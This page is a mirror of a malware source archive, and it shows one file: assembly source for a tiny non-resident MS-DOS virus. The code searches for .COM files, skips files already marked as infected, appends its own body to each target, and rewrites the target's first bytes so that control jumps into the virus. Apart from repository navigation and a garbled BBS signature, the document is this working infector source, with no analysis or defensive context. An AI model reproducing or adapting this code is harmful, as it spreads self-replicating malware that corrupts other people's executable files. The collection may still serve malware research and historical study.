ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
26192f771b
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.mini111.asm

114 lines
3.5 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-12 23:49:21 +00:00
;****************************************************************************
;* Mini non-resident virus
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN equ eind - start
FILNAM equ 69
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 100h
begin: db 4Dh
db 0E9, 4, 0
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: db 0CDh, 20h, 0, 0
push si ;si=0100
mov di,si
add si,[si+2] ;si=0104
push si
movsw
movsw
pop si ;si -> start (buffer)
mov dh,0FF ;set DTA to FF80
call setDTA
lea dx,[si+FILNAM] ;dx -> filename
mov ah,4Eh ;find first file
infloop: int 21
cwd ;set DTA to 0080 and quit
jc setDTA
mov dx,0FF9Eh
mov ax,3D02h ;open the file
call int21
jc exit1
xchg bx,ax
mov ah,3fh ;read begin of file
int 21
cmp byte ptr [si],4Dh ;EXE or infected COM?
je exit2
mov al,2 ;go to end of file
call seek
xchg ax,di
mov cl,FILELEN ;write program to end of file
mov ah,40h
int 21
mov al,0
call seek
mov word ptr [si],0E94Dh
mov word ptr [si+2],di
mov ah,40h
int 21
exit2: mov ah,3Eh ;close the file
int 21
exit1: mov ah,4Fh ;find next file
jmp short infloop
setDTA: mov dl,80
mov ah,1A
int 21
ret
seek: mov ah,42
cwd
int21: xor cx,cx
int 21
mov cl,04
mov dx,si
return: ret
;****************************************************************************
;* Data
;****************************************************************************
filename db '*.COM',0
eind:
cseg ends
end begin

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Reference in New Issue Copy Permalink